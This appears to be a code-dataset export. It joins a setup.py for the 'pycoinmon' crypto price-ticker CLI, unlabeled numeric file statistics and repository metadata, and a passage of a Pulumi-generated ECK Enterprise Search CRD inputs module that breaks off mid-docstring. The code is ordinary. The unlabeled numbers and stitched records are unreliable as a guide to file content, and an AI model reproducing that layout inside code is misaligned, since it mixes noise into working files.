from setuptools import setup
from pycoinmon.metadata import Metadata

# Version lives in the package itself so it is declared in exactly one place.
metadata = Metadata()

setup(
    name='pycoinmon',
    packages=['pycoinmon'],
    version=metadata.get_version(),
    license='MIT',
    description='Python Port Based on COINMON',
    url='https://github.com/RDCH106/pycoinmon',
    # NOTE(review): 'criptocurrency' looks like a typo for 'cryptocurrency',
    # but it is published package metadata — kept byte-identical; confirm
    # with the maintainer before changing.
    keywords=[
        'bitcoin',
        'criptocurrency',
        'crypto',
        'ticker',
        'python',
        'cli',
        'price-tracker',
        'command-line',
    ],
    classifiers=[
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
)
40.190476
115
0.575829
79
844
6.139241
0.531646
0.274227
0.360825
0.268041
0
0
0
0
0
0
0
0.02459
0.277251
844
21
116
40.190476
0.770492
0
0
0
0
0
0.478107
0
0
0
0
0
0
1
0
false
0
0.105263
0
0.105263
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
f7346818a39b5a17a62b2966aaea4541f1d02cd3
55,751
py
Python
operators/elastic-cloud-eck/python/pulumi_pulumi_kubernetes_crds_operators_elastic_cloud_eck/enterprisesearch/v1beta1/_inputs.py
pulumi/pulumi-kubernetes-crds
372c4c0182f6b899af82d6edaad521aa14f22150
[ "Apache-2.0" ]
null
null
null
operators/elastic-cloud-eck/python/pulumi_pulumi_kubernetes_crds_operators_elastic_cloud_eck/enterprisesearch/v1beta1/_inputs.py
pulumi/pulumi-kubernetes-crds
372c4c0182f6b899af82d6edaad521aa14f22150
[ "Apache-2.0" ]
2
2020-09-18T17:12:23.000Z
2020-12-30T19:40:56.000Z
operators/elastic-cloud-eck/python/pulumi_pulumi_kubernetes_crds_operators_elastic_cloud_eck/enterprisesearch/v1beta1/_inputs.py
pulumi/pulumi-kubernetes-crds
372c4c0182f6b899af82d6edaad521aa14f22150
[ "Apache-2.0" ]
null
null
null
# coding=utf-8 # *** WARNING: this file was generated by crd2pulumi. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = [ 'EnterpriseSearchSpecArgs', 'EnterpriseSearchSpecConfigRefArgs', 'EnterpriseSearchSpecElasticsearchRefArgs', 'EnterpriseSearchSpecHttpArgs', 'EnterpriseSearchSpecHttpServiceArgs', 'EnterpriseSearchSpecHttpServiceSpecArgs', 'EnterpriseSearchSpecHttpServiceSpecPortsArgs', 'EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs', 'EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs', 'EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigClientIPArgs', 'EnterpriseSearchSpecHttpTlsArgs', 'EnterpriseSearchSpecHttpTlsCertificateArgs', 'EnterpriseSearchSpecHttpTlsSelfSignedCertificateArgs', 'EnterpriseSearchSpecHttpTlsSelfSignedCertificateSubjectAltNamesArgs', 'EnterpriseSearchStatusArgs', ] @pulumi.input_type class EnterpriseSearchSpecArgs: def __init__(__self__, *, config: Optional[pulumi.Input[Mapping[str, Any]]] = None, config_ref: Optional[pulumi.Input['EnterpriseSearchSpecConfigRefArgs']] = None, count: Optional[pulumi.Input[int]] = None, elasticsearch_ref: Optional[pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs']] = None, http: Optional[pulumi.Input['EnterpriseSearchSpecHttpArgs']] = None, image: Optional[pulumi.Input[str]] = None, pod_template: Optional[pulumi.Input[Mapping[str, Any]]] = None, service_account_name: Optional[pulumi.Input[str]] = None, version: Optional[pulumi.Input[str]] = None): """ EnterpriseSearchSpec holds the specification of an Enterprise Search resource. :param pulumi.Input[Mapping[str, Any]] config: Config holds the Enterprise Search configuration. 
:param pulumi.Input['EnterpriseSearchSpecConfigRefArgs'] config_ref: ConfigRef contains a reference to an existing Kubernetes Secret holding the Enterprise Search configuration. Configuration settings are merged and have precedence over settings specified in `config`. :param pulumi.Input[int] count: Count of Enterprise Search instances to deploy. :param pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs'] elasticsearch_ref: ElasticsearchRef is a reference to the Elasticsearch cluster running in the same Kubernetes cluster. :param pulumi.Input['EnterpriseSearchSpecHttpArgs'] http: HTTP holds the HTTP layer configuration for Enterprise Search resource. :param pulumi.Input[str] image: Image is the Enterprise Search Docker image to deploy. :param pulumi.Input[Mapping[str, Any]] pod_template: PodTemplate provides customisation options (labels, annotations, affinity rules, resource requests, and so on) for the Enterprise Search pods. :param pulumi.Input[str] service_account_name: ServiceAccountName is used to check access from the current resource to a resource (eg. Elasticsearch) in a different namespace. Can only be used if ECK is enforcing RBAC on references. :param pulumi.Input[str] version: Version of Enterprise Search. 
""" if config is not None: pulumi.set(__self__, "config", config) if config_ref is not None: pulumi.set(__self__, "config_ref", config_ref) if count is not None: pulumi.set(__self__, "count", count) if elasticsearch_ref is not None: pulumi.set(__self__, "elasticsearch_ref", elasticsearch_ref) if http is not None: pulumi.set(__self__, "http", http) if image is not None: pulumi.set(__self__, "image", image) if pod_template is not None: pulumi.set(__self__, "pod_template", pod_template) if service_account_name is not None: pulumi.set(__self__, "service_account_name", service_account_name) if version is not None: pulumi.set(__self__, "version", version) @property @pulumi.getter def config(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ Config holds the Enterprise Search configuration. """ return pulumi.get(self, "config") @config.setter def config(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "config", value) @property @pulumi.getter(name="configRef") def config_ref(self) -> Optional[pulumi.Input['EnterpriseSearchSpecConfigRefArgs']]: """ ConfigRef contains a reference to an existing Kubernetes Secret holding the Enterprise Search configuration. Configuration settings are merged and have precedence over settings specified in `config`. """ return pulumi.get(self, "config_ref") @config_ref.setter def config_ref(self, value: Optional[pulumi.Input['EnterpriseSearchSpecConfigRefArgs']]): pulumi.set(self, "config_ref", value) @property @pulumi.getter def count(self) -> Optional[pulumi.Input[int]]: """ Count of Enterprise Search instances to deploy. """ return pulumi.get(self, "count") @count.setter def count(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "count", value) @property @pulumi.getter(name="elasticsearchRef") def elasticsearch_ref(self) -> Optional[pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs']]: """ ElasticsearchRef is a reference to the Elasticsearch cluster running in the same Kubernetes cluster. 
""" return pulumi.get(self, "elasticsearch_ref") @elasticsearch_ref.setter def elasticsearch_ref(self, value: Optional[pulumi.Input['EnterpriseSearchSpecElasticsearchRefArgs']]): pulumi.set(self, "elasticsearch_ref", value) @property @pulumi.getter def http(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpArgs']]: """ HTTP holds the HTTP layer configuration for Enterprise Search resource. """ return pulumi.get(self, "http") @http.setter def http(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpArgs']]): pulumi.set(self, "http", value) @property @pulumi.getter def image(self) -> Optional[pulumi.Input[str]]: """ Image is the Enterprise Search Docker image to deploy. """ return pulumi.get(self, "image") @image.setter def image(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "image", value) @property @pulumi.getter(name="podTemplate") def pod_template(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ PodTemplate provides customisation options (labels, annotations, affinity rules, resource requests, and so on) for the Enterprise Search pods. """ return pulumi.get(self, "pod_template") @pod_template.setter def pod_template(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "pod_template", value) @property @pulumi.getter(name="serviceAccountName") def service_account_name(self) -> Optional[pulumi.Input[str]]: """ ServiceAccountName is used to check access from the current resource to a resource (eg. Elasticsearch) in a different namespace. Can only be used if ECK is enforcing RBAC on references. """ return pulumi.get(self, "service_account_name") @service_account_name.setter def service_account_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "service_account_name", value) @property @pulumi.getter def version(self) -> Optional[pulumi.Input[str]]: """ Version of Enterprise Search. 
""" return pulumi.get(self, "version") @version.setter def version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "version", value) @pulumi.input_type class EnterpriseSearchSpecConfigRefArgs: def __init__(__self__, *, secret_name: Optional[pulumi.Input[str]] = None): """ ConfigRef contains a reference to an existing Kubernetes Secret holding the Enterprise Search configuration. Configuration settings are merged and have precedence over settings specified in `config`. :param pulumi.Input[str] secret_name: SecretName is the name of the secret. """ if secret_name is not None: pulumi.set(__self__, "secret_name", secret_name) @property @pulumi.getter(name="secretName") def secret_name(self) -> Optional[pulumi.Input[str]]: """ SecretName is the name of the secret. """ return pulumi.get(self, "secret_name") @secret_name.setter def secret_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "secret_name", value) @pulumi.input_type class EnterpriseSearchSpecElasticsearchRefArgs: def __init__(__self__, *, name: pulumi.Input[str], namespace: Optional[pulumi.Input[str]] = None): """ ElasticsearchRef is a reference to the Elasticsearch cluster running in the same Kubernetes cluster. :param pulumi.Input[str] name: Name of the Kubernetes object. :param pulumi.Input[str] namespace: Namespace of the Kubernetes object. If empty, defaults to the current namespace. """ pulumi.set(__self__, "name", name) if namespace is not None: pulumi.set(__self__, "namespace", namespace) @property @pulumi.getter def name(self) -> pulumi.Input[str]: """ Name of the Kubernetes object. """ return pulumi.get(self, "name") @name.setter def name(self, value: pulumi.Input[str]): pulumi.set(self, "name", value) @property @pulumi.getter def namespace(self) -> Optional[pulumi.Input[str]]: """ Namespace of the Kubernetes object. If empty, defaults to the current namespace. 
""" return pulumi.get(self, "namespace") @namespace.setter def namespace(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "namespace", value) @pulumi.input_type class EnterpriseSearchSpecHttpArgs: def __init__(__self__, *, service: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceArgs']] = None, tls: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsArgs']] = None): """ HTTP holds the HTTP layer configuration for Enterprise Search resource. :param pulumi.Input['EnterpriseSearchSpecHttpServiceArgs'] service: Service defines the template for the associated Kubernetes Service object. :param pulumi.Input['EnterpriseSearchSpecHttpTlsArgs'] tls: TLS defines options for configuring TLS for HTTP. """ if service is not None: pulumi.set(__self__, "service", service) if tls is not None: pulumi.set(__self__, "tls", tls) @property @pulumi.getter def service(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceArgs']]: """ Service defines the template for the associated Kubernetes Service object. """ return pulumi.get(self, "service") @service.setter def service(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceArgs']]): pulumi.set(self, "service", value) @property @pulumi.getter def tls(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsArgs']]: """ TLS defines options for configuring TLS for HTTP. """ return pulumi.get(self, "tls") @tls.setter def tls(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpTlsArgs']]): pulumi.set(self, "tls", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceArgs: def __init__(__self__, *, metadata: Optional[pulumi.Input[Mapping[str, Any]]] = None, spec: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs']] = None): """ Service defines the template for the associated Kubernetes Service object. :param pulumi.Input[Mapping[str, Any]] metadata: ObjectMeta is the metadata of the service. The name and namespace provided here are managed by ECK and will be ignored. 
:param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs'] spec: Spec is the specification of the service. """ if metadata is not None: pulumi.set(__self__, "metadata", metadata) if spec is not None: pulumi.set(__self__, "spec", spec) @property @pulumi.getter def metadata(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ ObjectMeta is the metadata of the service. The name and namespace provided here are managed by ECK and will be ignored. """ return pulumi.get(self, "metadata") @metadata.setter def metadata(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "metadata", value) @property @pulumi.getter def spec(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs']]: """ Spec is the specification of the service. """ return pulumi.get(self, "spec") @spec.setter def spec(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecArgs']]): pulumi.set(self, "spec", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecArgs: def __init__(__self__, *, cluster_ip: Optional[pulumi.Input[str]] = None, external_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, external_name: Optional[pulumi.Input[str]] = None, external_traffic_policy: Optional[pulumi.Input[str]] = None, health_check_node_port: Optional[pulumi.Input[int]] = None, ip_family: Optional[pulumi.Input[str]] = None, load_balancer_ip: Optional[pulumi.Input[str]] = None, load_balancer_source_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, ports: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]]] = None, publish_not_ready_addresses: Optional[pulumi.Input[bool]] = None, selector: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, session_affinity: Optional[pulumi.Input[str]] = None, session_affinity_config: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs']] = None, topology_keys: 
Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, type: Optional[pulumi.Input[str]] = None): """ Spec is the specification of the service. :param pulumi.Input[str] cluster_ip: clusterIP is the IP address of the service and is usually assigned randomly by the master. If an address is specified manually and is not in use by others, it will be allocated to the service; otherwise, creation of the service will fail. This field can not be changed through updates. Valid values are "None", empty string (""), or a valid IP address. "None" can be specified for headless services when proxying is not required. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies :param pulumi.Input[Sequence[pulumi.Input[str]]] external_ips: externalIPs is a list of IP addresses for which nodes in the cluster will also accept traffic for this service. These IPs are not managed by Kubernetes. The user is responsible for ensuring that traffic arrives at a node with this IP. A common example is external load-balancers that are not part of the Kubernetes system. :param pulumi.Input[str] external_name: externalName is the external reference that kubedns or equivalent will return as a CNAME record for this service. No proxying will be involved. Must be a valid RFC-1123 hostname (https://tools.ietf.org/html/rfc1123) and requires Type to be ExternalName. :param pulumi.Input[str] external_traffic_policy: externalTrafficPolicy denotes if this Service desires to route external traffic to node-local or cluster-wide endpoints. "Local" preserves the client source IP and avoids a second hop for LoadBalancer and Nodeport type services, but risks potentially imbalanced traffic spreading. "Cluster" obscures the client source IP and may cause a second hop to another node, but should have good overall load-spreading. 
:param pulumi.Input[int] health_check_node_port: healthCheckNodePort specifies the healthcheck nodePort for the service. If not specified, HealthCheckNodePort is created by the service api backend with the allocated nodePort. Will use user-specified nodePort value if specified by the client. Only effects when Type is set to LoadBalancer and ExternalTrafficPolicy is set to Local. :param pulumi.Input[str] ip_family: ipFamily specifies whether this Service has a preference for a particular IP family (e.g. IPv4 vs. IPv6). If a specific IP family is requested, the clusterIP field will be allocated from that family, if it is available in the cluster. If no IP family is requested, the cluster's primary IP family will be used. Other IP fields (loadBalancerIP, loadBalancerSourceRanges, externalIPs) and controllers which allocate external load-balancers should use the same IP family. Endpoints for this Service will be of this family. This field is immutable after creation. Assigning a ServiceIPFamily not available in the cluster (e.g. IPv6 in IPv4 only cluster) is an error condition and will fail during clusterIP assignment. :param pulumi.Input[str] load_balancer_ip: Only applies to Service Type: LoadBalancer LoadBalancer will get created with the IP specified in this field. This feature depends on whether the underlying cloud-provider supports specifying the loadBalancerIP when a load balancer is created. This field will be ignored if the cloud-provider does not support the feature. :param pulumi.Input[Sequence[pulumi.Input[str]]] load_balancer_source_ranges: If specified and supported by the platform, this will restrict traffic through the cloud-provider load-balancer will be restricted to the specified client IPs. This field will be ignored if the cloud-provider does not support the feature." 
More info: https://kubernetes.io/docs/tasks/access-application-cluster/configure-cloud-provider-firewall/ :param pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]] ports: The list of ports that are exposed by this service. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies :param pulumi.Input[bool] publish_not_ready_addresses: publishNotReadyAddresses, when set to true, indicates that DNS implementations must publish the notReadyAddresses of subsets for the Endpoints associated with the Service. The default value is false. The primary use case for setting this field is to use a StatefulSet's Headless Service to propagate SRV records for its Pods without respect to their readiness for purpose of peer discovery. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] selector: Route service traffic to pods with label keys and values matching this selector. If empty or not present, the service is assumed to have an external process managing its endpoints, which Kubernetes will not modify. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/ :param pulumi.Input[str] session_affinity: Supports "ClientIP" and "None". Used to maintain session affinity. Enable client IP based session affinity. Must be ClientIP or None. Defaults to None. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs'] session_affinity_config: sessionAffinityConfig contains the configurations of session affinity. 
:param pulumi.Input[Sequence[pulumi.Input[str]]] topology_keys: topologyKeys is a preference-order list of topology keys which implementations of services should use to preferentially sort endpoints when accessing this Service, it can not be used at the same time as externalTrafficPolicy=Local. Topology keys must be valid label keys and at most 16 keys may be specified. Endpoints are chosen based on the first topology key with available backends. If this field is specified and all entries have no backends that match the topology of the client, the service has no backends for that client and connections should fail. The special value "*" may be used to mean "any topology". This catch-all value, if used, only makes sense as the last value in the list. If this is not specified or empty, no topology constraints will be applied. :param pulumi.Input[str] type: type determines how the Service is exposed. Defaults to ClusterIP. Valid options are ExternalName, ClusterIP, NodePort, and LoadBalancer. "ExternalName" maps to the specified externalName. "ClusterIP" allocates a cluster-internal IP address for load-balancing to endpoints. Endpoints are determined by the selector or if that is not specified, by manual construction of an Endpoints object. If clusterIP is "None", no virtual IP is allocated and the endpoints are published as a set of endpoints rather than a stable IP. "NodePort" builds on ClusterIP and allocates a port on every node which routes to the clusterIP. "LoadBalancer" builds on NodePort and creates an external load-balancer (if supported in the current cloud) which routes to the clusterIP. 
More info: https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types """ if cluster_ip is not None: pulumi.set(__self__, "cluster_ip", cluster_ip) if external_ips is not None: pulumi.set(__self__, "external_ips", external_ips) if external_name is not None: pulumi.set(__self__, "external_name", external_name) if external_traffic_policy is not None: pulumi.set(__self__, "external_traffic_policy", external_traffic_policy) if health_check_node_port is not None: pulumi.set(__self__, "health_check_node_port", health_check_node_port) if ip_family is not None: pulumi.set(__self__, "ip_family", ip_family) if load_balancer_ip is not None: pulumi.set(__self__, "load_balancer_ip", load_balancer_ip) if load_balancer_source_ranges is not None: pulumi.set(__self__, "load_balancer_source_ranges", load_balancer_source_ranges) if ports is not None: pulumi.set(__self__, "ports", ports) if publish_not_ready_addresses is not None: pulumi.set(__self__, "publish_not_ready_addresses", publish_not_ready_addresses) if selector is not None: pulumi.set(__self__, "selector", selector) if session_affinity is not None: pulumi.set(__self__, "session_affinity", session_affinity) if session_affinity_config is not None: pulumi.set(__self__, "session_affinity_config", session_affinity_config) if topology_keys is not None: pulumi.set(__self__, "topology_keys", topology_keys) if type is not None: pulumi.set(__self__, "type", type) @property @pulumi.getter(name="clusterIP") def cluster_ip(self) -> Optional[pulumi.Input[str]]: """ clusterIP is the IP address of the service and is usually assigned randomly by the master. If an address is specified manually and is not in use by others, it will be allocated to the service; otherwise, creation of the service will fail. This field can not be changed through updates. Valid values are "None", empty string (""), or a valid IP address. "None" can be specified for headless services when proxying is not required. 
Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies """ return pulumi.get(self, "cluster_ip") @cluster_ip.setter def cluster_ip(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "cluster_ip", value) @property @pulumi.getter(name="externalIPs") def external_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ externalIPs is a list of IP addresses for which nodes in the cluster will also accept traffic for this service. These IPs are not managed by Kubernetes. The user is responsible for ensuring that traffic arrives at a node with this IP. A common example is external load-balancers that are not part of the Kubernetes system. """ return pulumi.get(self, "external_ips") @external_ips.setter def external_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "external_ips", value) @property @pulumi.getter(name="externalName") def external_name(self) -> Optional[pulumi.Input[str]]: """ externalName is the external reference that kubedns or equivalent will return as a CNAME record for this service. No proxying will be involved. Must be a valid RFC-1123 hostname (https://tools.ietf.org/html/rfc1123) and requires Type to be ExternalName. """ return pulumi.get(self, "external_name") @external_name.setter def external_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "external_name", value) @property @pulumi.getter(name="externalTrafficPolicy") def external_traffic_policy(self) -> Optional[pulumi.Input[str]]: """ externalTrafficPolicy denotes if this Service desires to route external traffic to node-local or cluster-wide endpoints. "Local" preserves the client source IP and avoids a second hop for LoadBalancer and Nodeport type services, but risks potentially imbalanced traffic spreading. 
"Cluster" obscures the client source IP and may cause a second hop to another node, but should have good overall load-spreading. """ return pulumi.get(self, "external_traffic_policy") @external_traffic_policy.setter def external_traffic_policy(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "external_traffic_policy", value) @property @pulumi.getter(name="healthCheckNodePort") def health_check_node_port(self) -> Optional[pulumi.Input[int]]: """ healthCheckNodePort specifies the healthcheck nodePort for the service. If not specified, HealthCheckNodePort is created by the service api backend with the allocated nodePort. Will use user-specified nodePort value if specified by the client. Only effects when Type is set to LoadBalancer and ExternalTrafficPolicy is set to Local. """ return pulumi.get(self, "health_check_node_port") @health_check_node_port.setter def health_check_node_port(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "health_check_node_port", value) @property @pulumi.getter(name="ipFamily") def ip_family(self) -> Optional[pulumi.Input[str]]: """ ipFamily specifies whether this Service has a preference for a particular IP family (e.g. IPv4 vs. IPv6). If a specific IP family is requested, the clusterIP field will be allocated from that family, if it is available in the cluster. If no IP family is requested, the cluster's primary IP family will be used. Other IP fields (loadBalancerIP, loadBalancerSourceRanges, externalIPs) and controllers which allocate external load-balancers should use the same IP family. Endpoints for this Service will be of this family. This field is immutable after creation. Assigning a ServiceIPFamily not available in the cluster (e.g. IPv6 in IPv4 only cluster) is an error condition and will fail during clusterIP assignment. 
""" return pulumi.get(self, "ip_family") @ip_family.setter def ip_family(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ip_family", value) @property @pulumi.getter(name="loadBalancerIP") def load_balancer_ip(self) -> Optional[pulumi.Input[str]]: """ Only applies to Service Type: LoadBalancer LoadBalancer will get created with the IP specified in this field. This feature depends on whether the underlying cloud-provider supports specifying the loadBalancerIP when a load balancer is created. This field will be ignored if the cloud-provider does not support the feature. """ return pulumi.get(self, "load_balancer_ip") @load_balancer_ip.setter def load_balancer_ip(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "load_balancer_ip", value) @property @pulumi.getter(name="loadBalancerSourceRanges") def load_balancer_source_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ If specified and supported by the platform, this will restrict traffic through the cloud-provider load-balancer will be restricted to the specified client IPs. This field will be ignored if the cloud-provider does not support the feature." More info: https://kubernetes.io/docs/tasks/access-application-cluster/configure-cloud-provider-firewall/ """ return pulumi.get(self, "load_balancer_source_ranges") @load_balancer_source_ranges.setter def load_balancer_source_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "load_balancer_source_ranges", value) @property @pulumi.getter def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]]]: """ The list of ports that are exposed by this service. 
More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies """ return pulumi.get(self, "ports") @ports.setter def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsArgs']]]]): pulumi.set(self, "ports", value) @property @pulumi.getter(name="publishNotReadyAddresses") def publish_not_ready_addresses(self) -> Optional[pulumi.Input[bool]]: """ publishNotReadyAddresses, when set to true, indicates that DNS implementations must publish the notReadyAddresses of subsets for the Endpoints associated with the Service. The default value is false. The primary use case for setting this field is to use a StatefulSet's Headless Service to propagate SRV records for its Pods without respect to their readiness for purpose of peer discovery. """ return pulumi.get(self, "publish_not_ready_addresses") @publish_not_ready_addresses.setter def publish_not_ready_addresses(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "publish_not_ready_addresses", value) @property @pulumi.getter def selector(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]: """ Route service traffic to pods with label keys and values matching this selector. If empty or not present, the service is assumed to have an external process managing its endpoints, which Kubernetes will not modify. Only applies to types ClusterIP, NodePort, and LoadBalancer. Ignored if type is ExternalName. More info: https://kubernetes.io/docs/concepts/services-networking/service/ """ return pulumi.get(self, "selector") @selector.setter def selector(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]): pulumi.set(self, "selector", value) @property @pulumi.getter(name="sessionAffinity") def session_affinity(self) -> Optional[pulumi.Input[str]]: """ Supports "ClientIP" and "None". Used to maintain session affinity. Enable client IP based session affinity. Must be ClientIP or None. Defaults to None. 
More info: https://kubernetes.io/docs/concepts/services-networking/service/#virtual-ips-and-service-proxies """ return pulumi.get(self, "session_affinity") @session_affinity.setter def session_affinity(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "session_affinity", value) @property @pulumi.getter(name="sessionAffinityConfig") def session_affinity_config(self) -> Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs']]: """ sessionAffinityConfig contains the configurations of session affinity. """ return pulumi.get(self, "session_affinity_config") @session_affinity_config.setter def session_affinity_config(self, value: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecSessionAffinityConfigArgs']]): pulumi.set(self, "session_affinity_config", value) @property @pulumi.getter(name="topologyKeys") def topology_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ topologyKeys is a preference-order list of topology keys which implementations of services should use to preferentially sort endpoints when accessing this Service, it can not be used at the same time as externalTrafficPolicy=Local. Topology keys must be valid label keys and at most 16 keys may be specified. Endpoints are chosen based on the first topology key with available backends. If this field is specified and all entries have no backends that match the topology of the client, the service has no backends for that client and connections should fail. The special value "*" may be used to mean "any topology". This catch-all value, if used, only makes sense as the last value in the list. If this is not specified or empty, no topology constraints will be applied. 
""" return pulumi.get(self, "topology_keys") @topology_keys.setter def topology_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "topology_keys", value) @property @pulumi.getter def type(self) -> Optional[pulumi.Input[str]]: """ type determines how the Service is exposed. Defaults to ClusterIP. Valid options are ExternalName, ClusterIP, NodePort, and LoadBalancer. "ExternalName" maps to the specified externalName. "ClusterIP" allocates a cluster-internal IP address for load-balancing to endpoints. Endpoints are determined by the selector or if that is not specified, by manual construction of an Endpoints object. If clusterIP is "None", no virtual IP is allocated and the endpoints are published as a set of endpoints rather than a stable IP. "NodePort" builds on ClusterIP and allocates a port on every node which routes to the clusterIP. "LoadBalancer" builds on NodePort and creates an external load-balancer (if supported in the current cloud) which routes to the clusterIP. More info: https://kubernetes.io/docs/concepts/services-networking/service/#publishing-services-service-types """ return pulumi.get(self, "type") @type.setter def type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "type", value) @pulumi.input_type class EnterpriseSearchSpecHttpServiceSpecPortsArgs: def __init__(__self__, *, port: pulumi.Input[int], app_protocol: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, node_port: Optional[pulumi.Input[int]] = None, protocol: Optional[pulumi.Input[str]] = None, target_port: Optional[pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs']] = None): """ ServicePort contains information on service's port. :param pulumi.Input[int] port: The port that will be exposed by this service. :param pulumi.Input[str] app_protocol: The application protocol for this port. This field follows standard Kubernetes label syntax. 
Un-prefixed names are reserved for IANA standard service names (as per RFC-6335 and http://www.iana.org/assignments/service-names). Non-standard protocols should use prefixed names such as mycompany.com/my-custom-protocol. Field can be enabled with ServiceAppProtocol feature gate. :param pulumi.Input[str] name: The name of this port within the service. This must be a DNS_LABEL. All ports within a ServiceSpec must have unique names. When considering the endpoints for a Service, this must match the 'name' field in the EndpointPort. Optional if only one ServicePort is defined on this service. :param pulumi.Input[int] node_port: The port on each node on which this service is exposed when type=NodePort or LoadBalancer. Usually assigned by the system. If specified, it will be allocated to the service if unused or else creation of the service will fail. Default is to auto-allocate a port if the ServiceType of this Service requires one. More info: https://kubernetes.io/docs/concepts/services-networking/service/#type-nodeport :param pulumi.Input[str] protocol: The IP protocol for this port. Supports "TCP", "UDP", and "SCTP". Default is TCP. :param pulumi.Input['EnterpriseSearchSpecHttpServiceSpecPortsTargetPortArgs'] target_port: Number or name of the port to access on the pods targeted by the service. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. If this is a string, it will be looked up as a named port in the target Pod's container ports. If this is not specified, the value of the 'port' field is used (an identity map). This field is ignored for services with clusterIP=None, and should be omitted or set equal to the 'port' field. 
